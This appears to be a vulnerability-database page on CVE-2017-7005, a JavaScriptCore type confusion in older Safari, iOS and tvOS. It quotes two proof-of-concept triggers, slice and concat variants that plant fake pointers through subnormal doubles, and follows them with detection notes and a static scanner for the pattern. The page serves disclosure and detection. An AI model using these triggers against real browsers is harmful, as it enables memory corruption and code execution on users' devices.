CVE-2017-7005
published 2018-04-03


Priority: P2 (63)
CVSS 3.0: 8.8 High (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Exploit: available (PoC quoted below)
EPSS: 6.70% (93.1st percentile)
An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the "JavaScriptCore" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

Affected (6 ranges)

Vendor  Product     Version range   Fixed in
apple   ios         -               -
apple   iphone_os   < 10.3.2        10.3.2
apple   safari      < 10.1.1        10.1.1
apple   safari      -               -
apple   tvos        < 10.2.1        10.2.1
apple   tvos        -               -

Detection & IOCs (extracted from sources)

PoC, slice variant (exploit code as quoted in the sources; behaviour kept as published):

    // numeric-index accessor on Array.prototype: this frame's global "has a bad time"
    Array.prototype.__defineGetter__(100, () => 1);
    // same-origin iframe: its global has not, so its arrays stay ArrayWithDouble
    let f = document.body.appendChild(document.createElement('iframe'));
    // subnormal doubles; raw bits 0x1234 become fake pointers once misread as JSValues
    let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);
    // this frame's slice picks the wrong indexing type for the result array
    let c = Array.prototype.slice.call(a);
    alert(c);

PoC, concat variant (same setup, confusion reached through concat):

    Array.prototype.__defineGetter__(100, () => 1);
    let f = document.body.appendChild(document.createElement('iframe'));
    let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
    let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
    // same confusion via arrayProtoPrivateFuncConcatMemcpy
    let c = Array.prototype.concat.call(a, b);
    alert(c);
  • Detect the pairing of an accessor installed on a numeric index of Array.prototype (e.g. Array.prototype.__defineGetter__(100, ...)) with arrays built through another frame's Array constructor; that pairing is the trigger for the JSGlobalObject::haveABadTime type confusion in JavaScriptCore.
  • Look for JavaScript that constructs arrays via a same-origin iframe's contentWindow.Array (cross-origin access to contentWindow.Array would throw), fills them with the subnormal double 2.3023e-320 (raw bit pattern 0x1234, which is read as a JSCell pointer once the storage is misinterpreted as JSValues), and then calls Array.prototype.slice.call or Array.prototype.concat.call on the result; this is the public PoC pattern for CVE-2017-7005.
  • The bug triggers when an array from a different JSGlobalObject (another frame) is passed to arrayProtoPrivateFuncConcatMemcpy or arrayProtoFuncSlice: resultStructure resolves to ArrayWithSlowPutArrayStorage instead of the expected ArrayWithDouble, so raw doubles are copied into storage that is subsequently treated as JSValues, a type confusion that corrupts memory.
  • Monitor for web content that causes unexpected termination of, or code execution in, the WebKit content process on iOS before 10.3.2, Safari before 10.1.1 and tvOS before 10.2.1.
  • Affected products and versions: iOS before 10.3.2, Safari before 10.1.1, tvOS before 10.2.1; the fix is in the JavaScriptCore component of those releases.
  • Both conditions are required: the array must originate in a different JSGlobalObject (another frame) AND an accessor must have been placed on a numeric index of Array.prototype in the frame whose slice or concat is invoked, so that haveABadTime is active there and forces the ArrayWithSlowPutArrayStorage indexing type on the result.
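Added here as an example, not code from the original page, WebKit or Apple: a static heuristic scanner in JavaScript that applies the three structural indicators listed above to source text and, going one step beyond the notes, decodes any subnormal double literal into the raw bit pattern it would plant as a fake pointer. The names scanForCve20177005, rawBitsHex and SAMPLES and the benign sample are this example's own; the two PoC samples are the one-liners quoted above. It inspects text only and never executes the sample.

```javascript
// Added example (not from the original page, WebKit or Apple): a static heuristic
// scanner for the CVE-2017-7005 trigger pattern described in the detection notes.
// Names (scanForCve20177005, rawBitsHex, SAMPLES) are this example's own.

const INDICATORS = {
  // 1. Accessor on a numeric index of Array.prototype: flips the defining frame's
  //    global into "had a bad time" mode (SlowPutArrayStorage for new arrays).
  badTimeSetup:
    /Array\.prototype\.__define(?:Getter|Setter)__\s*\(\s*\d+|Object\.defineProperty\s*\(\s*Array\.prototype\s*,\s*['"]?\d+['"]?/,
  // 2. Array constructed with another frame's Array constructor (a different
  //    JSGlobalObject that has NOT had a bad time, so it stays ArrayWithDouble).
  crossFrameArray: /contentWindow\s*\.\s*Array\s*\(/,
  // 3. The affected builtins applied to that foreign array.
  sliceOrConcat: /Array\.prototype\.(?:slice|concat)\.(?:call|apply)\s*\(/,
};

// Smallest positive normal double; any positive value below it is subnormal.
const MIN_NORMAL = 2.2250738585072014e-308;
const FLOAT_LITERAL = /\b\d+(?:\.\d+)?[eE][-+]?\d+\b/g;

// Raw IEEE-754 bits of a double: the value an ArrayWithDouble slot turns into when
// the storage is misread as JSValue array storage (0x1234 for 2.3023e-320).
function rawBitsHex(v) {
  const buf = new ArrayBuffer(8);
  new Float64Array(buf)[0] = v;
  return '0x' + new BigUint64Array(buf)[0].toString(16);
}

function scanForCve20177005(source) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  const subnormals = [...new Set(source.match(FLOAT_LITERAL) || [])]
    .map((lit) => ({ literal: lit, value: parseFloat(lit) }))
    .filter(({ value }) => value > 0 && value < MIN_NORMAL)
    .map(({ literal, value }) => ({ literal, bits: rawBitsHex(value) }));
  // All three structural indicators are needed for the type confusion; the
  // subnormal literals only show which fake pointers the payload would plant.
  const structural = ['badTimeSetup', 'crossFrameArray', 'sliceOrConcat'];
  const verdict = structural.every((k) => hits.includes(k)) ? 'suspicious' : 'clean';
  return { verdict, hits, subnormals };
}

// Constructed samples: the two PoC one-liners quoted in the detection notes and one
// benign use of slice.call that must not be flagged.
const SAMPLES = {
  slicePoC: "Array.prototype.__defineGetter__(100, () => 1); let f = document.body.appendChild(document.createElement('iframe')); let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320); let c = Array.prototype.slice.call(a); alert(c);",
  concatPoC: "Array.prototype.__defineGetter__(100, () => 1); let f = document.body.appendChild(document.createElement('iframe')); let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320); let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320); let c = Array.prototype.concat.call(a, b); alert(c);",
  benign: "function toArray() { return Array.prototype.slice.call(arguments); } toArray(1, 2.5e-3, 3);",
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, src] of Object.entries(SAMPLES)) {
    console.log(name, JSON.stringify(scanForCve20177005(src)));
  }
}
```

Run with `node scan.js`: both PoC samples come back `suspicious` with the literal 2.3023e-320 decoded to 0x1234, the benign sample comes back `clean` even though it also calls Array.prototype.slice.call. The verdict deliberately requires all three structural indicators, since slice.call or a numeric-index getter on its own is common in legitimate code; treat the scanner as a triage aid, not a blocking control.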

CVSS provenance

Source  Version   Score       Vector
NVD     CVSS 3.0  8.8 HIGH    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
NVD     CVSS 2.0  6.8 MEDIUM  AV:N/AC:M/Au:N/C:P/I:P/A:P